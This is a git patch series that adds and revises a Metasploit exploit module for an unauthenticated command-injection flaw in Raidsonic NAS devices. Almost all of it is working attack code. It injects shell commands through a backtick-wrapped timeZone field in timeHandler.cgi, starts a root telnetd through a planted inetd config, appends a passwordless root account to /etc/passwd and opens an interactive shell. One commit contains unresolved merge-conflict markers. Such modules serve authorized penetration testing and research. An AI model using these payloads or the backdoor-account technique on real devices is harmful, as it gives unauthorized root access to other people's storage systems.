From 62e3c011906912abd5821354d8ff550b6946243a Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Fri, 2 Aug 2013 21:04:19 +0200 Subject: [PATCH 01/14] raidsonic nas - command execution --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 208 ++++++++++++++++++ 1 file changed, 208 insertions(+) create mode 100644 modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb new file mode 100644 index 0000000000..f693df1ac4 --- /dev/null +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -0,0 +1,208 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::CommandShell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', + 'Description' => %q{ + Different Raidsonic NAS devices are vulnerable to OS command injection via the web + interface. The vulnerability exists in timeHandler.cgi, which is accessible without + authentication. This module has been tested with the versions IB-NAS5220 and + IB-NAS4220. + Two target are included, first to start a telnetd service and establish a session over + it and second to run commands via the CMD target. + }, + 'Author' => + [ + 'Michael Messner ', # Vulnerability discovery and Metasploit module + 'juan vazquez' # minor help with msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '90221' ], + [ 'EDB', '24499' ], + [ 'BID', '57958' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ] + ], + 'DisclosureDate' => 'Feb 04 2013', + 'Privileged' => true, + 'Platform' => ['linux','unix'], + 'Payload' => + { + 'DisableNops' => true, + }, + 'Targets' => + [ + [ 'CMD', #all devices + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix' + } + ], + [ 'Telnet', #all devices - default target + { + 'Arch' => ARCH_CMD, + 'Platform' => 'unix' + } + ], + ], + 'DefaultTarget' => 1 + )) + end + + def exploit + if target.name =~ /CMD/ + exploit_cmd + else + exploit_telnet + end + end + + def exploit_cmd + if not (datastore['CMD']) + fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") + end + print_status("#{rhost}:#{rport} - Sending remote command") + res = request(payload.encoded) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + + print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n") + + return + end + + def exploit_telnet + telnetport = rand(65535) + + response_pattern = "\ /tmp/inetd.conf" + cmd = Rex::Text.uri_encode(cmd) + vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + + #third request + cmd = "/usr/sbin/inetd /tmp/inetd.conf" + cmd = Rex::Text.uri_encode(cmd) + vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + + #fourth request + user = rand_text_alpha(6) + cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" + cmd = Rex::Text.uri_encode(cmd) + vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + begin + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) + + if sock + print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") + add_socket(sock) + else + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end + + print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" + auth_info = { + :host => rhost, + :port => telnetport, + :sname => 'telnet', + :user => user, + :pass => "", + :source_type => "exploit", + :active => true + } + report_auth_info(auth_info) + merge_me = { + 'USERPASS_FILE' => nil, + 'USER_FILE' => nil, + 'PASS_FILE' => nil, + 'USERNAME' => user, + 'PASSWORD' => nil + } + start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) + rescue + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end + return + end + + def request(cmd) + + uri = '/cgi/time/timeHandler.cgi' + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + #not working without setting encode_params to false! + 'encode_params' => false, + 'vars_post' => { + "month" => "#{rand(12)}", + "date" => "#{rand(30)}", + "year" => "20#{rand(99)}", + "hour" => "#{rand(12)}", + "minute" => "#{rand(60)}", + "ampm" => "PM", + "timeZone" => "Amsterdam`#{cmd}`", + "ntp_type" => "default", + "ntpServer" => "none", + "old_date" => " 1 12007", + "old_time" => "1210", + "old_timeZone" => "Amsterdam", + "renew" => "0" + } + }) + return res + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return nil + end + end +end From b8ed364cb89758b8d17183bee0276ca5912feb39 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 3 Aug 2013 15:07:10 +0200 Subject: [PATCH 02/14] telnet user working --- .../exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index f693df1ac4..074425f7f9 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -75,10 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end + response_pattern = "\ user, 'PASSWORD' => nil } + sock.put(user) + sock.put("\r\n") start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") From 34134b2e112cf0ed6de0842c7ff08c81594943d8 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 4 Aug 2013 14:45:55 +0200 Subject: [PATCH 03/14] feedback included --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 25 ++++++++++--------- 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 074425f7f9..e5da1f9993 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -12,12 +12,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', 'Description' => %q{ - Different Raidsonic NAS devices are vulnerable to OS command injection via the web + Different Raidsonic NAS devices are vulnerable to OS command injection via the web interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and IB-NAS4220. @@ -64,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit + @response_pattern = "\ /tmp/inetd.conf" + inetd_cfg = rand_text_alpha(8) + cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end #third request - cmd = "/usr/sbin/inetd /tmp/inetd.conf" + cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end @@ -136,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin From 2efc2a79bfdeb5241d4842982b8c6820de41c6cf Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 5 Aug 2013 21:41:28 +0200 Subject: [PATCH 04/14] fail with --- .../exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index e5da1f9993..997b435ca6 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -205,8 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return nil + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end end From 885417c9d9aff4efd690b54cde28db2c40ffab21 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Tue, 6 Aug 2013 15:11:54 +0200 Subject: [PATCH 05/14] removing config file from target --- .../exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 997b435ca6..f8f37a24fa 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -110,7 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") - register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -170,6 +169,8 @@ class Metasploit3 < Msf::Exploit::Remote } sock.put(user) sock.put("\r\n") + sock.put("rm /tmp/#{inetd_cfg}") + sock.put("\r\n") start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") From 6b872403230b6ea91fa07e97f4a2632ce30cb4db Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Wed, 14 Aug 2013 16:51:09 +0200 Subject: [PATCH 06/14] thx to juan ... session stuff looks better --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 119 +++++++++--------- 1 file changed, 63 insertions(+), 56 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index f8f37a24fa..5c4c24dd8c 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -41,63 +41,57 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], - 'Payload' => + 'Payload' => { - 'DisableNops' => true, + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ - [ 'CMD', #all devices - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], - [ 'Telnet', #all devices - default target - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], + [ 'Automatic', { } ], ], - 'DefaultTarget' => 1 + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def tel_timeout + (datastore['TelnetTimeout'] || 10).to_i + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i end def exploit @response_pattern = "\ /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + print_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote user = rand_text_alpha(6) cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) - if sock - print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") - add_socket(sock) - else + if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end @@ -160,18 +153,17 @@ class Metasploit3 < Msf::Exploit::Remote :active => true } report_auth_info(auth_info) - merge_me = { - 'USERPASS_FILE' => nil, - 'USER_FILE' => nil, - 'PASS_FILE' => nil, - 'USERNAME' => user, - 'PASSWORD' => nil - } + prompt = negotiate_telnet(sock) + if prompt.nil? + sock.close + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{rport} - Telnet session successfully established...") + end + sock.put(user) sock.put("\r\n") - sock.put("rm /tmp/#{inetd_cfg}") - sock.put("\r\n") - start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) + handler(sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end @@ -206,7 +198,22 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + end + end + def negotiate_telnet(sock) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, tel_timeout) + return nil if not data or data.length == 0 + if data =~ /login/ + return true + end + end + end + rescue ::Timeout::Error + return nil end end end From 90aec6cff5d7a6b10414ffb3012b7a44b459c48e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 14 Aug 2013 13:38:51 -0500 Subject: [PATCH 07/14] Fix telnet negotiation for the raidsonic case --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 130 ++++++++++-------- 1 file changed, 72 insertions(+), 58 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index f8f37a24fa..02adb00608 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -41,63 +41,57 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], - 'Payload' => + 'Payload' => { - 'DisableNops' => true, + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ - [ 'CMD', #all devices - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], - [ 'Telnet', #all devices - default target - { - 'Arch' => ARCH_CMD, - 'Platform' => 'unix' - } - ], + [ 'Automatic', { } ], ], - 'DefaultTarget' => 1 + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def tel_timeout + (datastore['TelnetTimeout'] || 10).to_i + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i end def exploit @response_pattern = "\ /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending second request - configure inetd") + print_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote user = rand_text_alpha(6) cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) - vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) - if sock - print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") - add_socket(sock) - else + if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end @@ -160,18 +153,15 @@ class Metasploit3 < Msf::Exploit::Remote :active => true } report_auth_info(auth_info) - merge_me = { - 'USERPASS_FILE' => nil, - 'USER_FILE' => nil, - 'PASS_FILE' => nil, - 'USERNAME' => user, - 'PASSWORD' => nil - } - sock.put(user) - sock.put("\r\n") - sock.put("rm /tmp/#{inetd_cfg}") - sock.put("\r\n") - start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) + prompt = negotiate_telnet(sock) + if prompt.nil? + sock.close + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{rport} - Telnet session successfully established...") + end + + handler(sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end @@ -206,7 +196,31 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + end + end + + def negotiate_telnet(sock) + login = read_telnet(sock, "login: $") + if login + sock.put("#{user}\r\n") + end + return read_telnet(sock, "> $") + end + + def read_telnet(sock, pattern) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, tel_timeout) + return nil if not data or data.length == 0 + if data =~ /#{pattern}/ + return true + end + end + end + rescue ::Timeout::Error + return nil end end end From 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 14 Aug 2013 13:50:08 -0500 Subject: [PATCH 08/14] Beautify --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 61 +++++++------------ 1 file changed, 23 insertions(+), 38 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 02adb00608..90a2437fd5 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -14,6 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Auxiliary::CommandShell include Msf::Exploit::FileDropper + RESPONSE_PATTERN = "\ 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', @@ -22,8 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and IB-NAS4220. - Two target are included, first to start a telnetd service and establish a session over - it and second to run commands via the CMD target. }, 'Author' => [ @@ -79,14 +79,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - @response_pattern = "\ /tmp/#{inetd_cfg}" + cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending second request - configure inetd") register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end @@ -119,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end @@ -131,28 +126,18 @@ class Metasploit3 < Msf::Exploit::Remote res = request(cmd) #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/) + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end begin print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end - print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" - auth_info = { - :host => rhost, - :port => telnetport, - :sname => 'telnet', - :user => user, - :pass => "", - :source_type => "exploit", - :active => true - } - report_auth_info(auth_info) + print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") prompt = negotiate_telnet(sock) if prompt.nil? sock.close @@ -179,19 +164,19 @@ class Metasploit3 < Msf::Exploit::Remote #not working without setting encode_params to false! 'encode_params' => false, 'vars_post' => { - "month" => "#{rand(12)}", - "date" => "#{rand(30)}", - "year" => "20#{rand(99)}", - "hour" => "#{rand(12)}", - "minute" => "#{rand(60)}", - "ampm" => "PM", - "timeZone" => "Amsterdam`#{cmd}`", - "ntp_type" => "default", - "ntpServer" => "none", - "old_date" => " 1 12007", - "old_time" => "1210", + "month" => "#{rand(12)}", + "date" => "#{rand(30)}", + "year" => "20#{rand(99)}", + "hour" => "#{rand(12)}", + "minute" => "#{rand(60)}", + "ampm" => "PM", + "timeZone" => "Amsterdam`#{cmd}`", + "ntp_type" => "default", + "ntpServer" => "none", + "old_date" => " 1 12007", + "old_time" => "1210", "old_timeZone" => "Amsterdam", - "renew" => "0" + "renew" => "0" } }) return res From 5fc806e3e070230dd3f924e4b6e78f6c64ce0989 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 18 Aug 2013 16:18:27 +0200 Subject: [PATCH 09/14] little fixes --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 51 ++----------------- 1 file changed, 4 insertions(+), 47 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 3a2d5b3dab..561901e60a 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -76,24 +76,12 @@ class Metasploit3 < Msf::Exploit::Remote def banner_timeout (datastore['TelnetBannerTimeout'] || 25).to_i -<<<<<<< HEAD - end - - def exploit - @response_pattern = "\>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 end def exploit telnet_port = rand(65535) -<<<<<<< HEAD - print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}") -======= print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 #first request cmd = "killall inetd" @@ -131,10 +119,10 @@ class Metasploit3 < Msf::Exploit::Remote end #fourth request - user = rand_text_alpha(6) - cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd" + @user = rand_text_alpha(6) + cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}") + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed @@ -143,31 +131,13 @@ class Metasploit3 < Msf::Exploit::Remote end begin print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") -<<<<<<< HEAD - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) -======= sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end -<<<<<<< HEAD - print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" - auth_info = { - :host => rhost, - :port => telnetport, - :sname => 'telnet', - :user => user, - :pass => "", - :source_type => "exploit", - :active => true - } - report_auth_info(auth_info) -======= print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 prompt = negotiate_telnet(sock) if prompt.nil? sock.close @@ -176,11 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote print_good("#{rhost}:#{rport} - Telnet session successfully established...") end -<<<<<<< HEAD - sock.put(user) - sock.put("\r\n") -======= ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 handler(sock) rescue fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") @@ -219,30 +184,22 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end -<<<<<<< HEAD - def negotiate_telnet(sock) -======= def negotiate_telnet(sock) login = read_telnet(sock, "login: $") if login - sock.put("#{user}\r\n") + sock.put("#{@user}\r\n") end return read_telnet(sock, "> $") end def read_telnet(sock, pattern) ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 begin 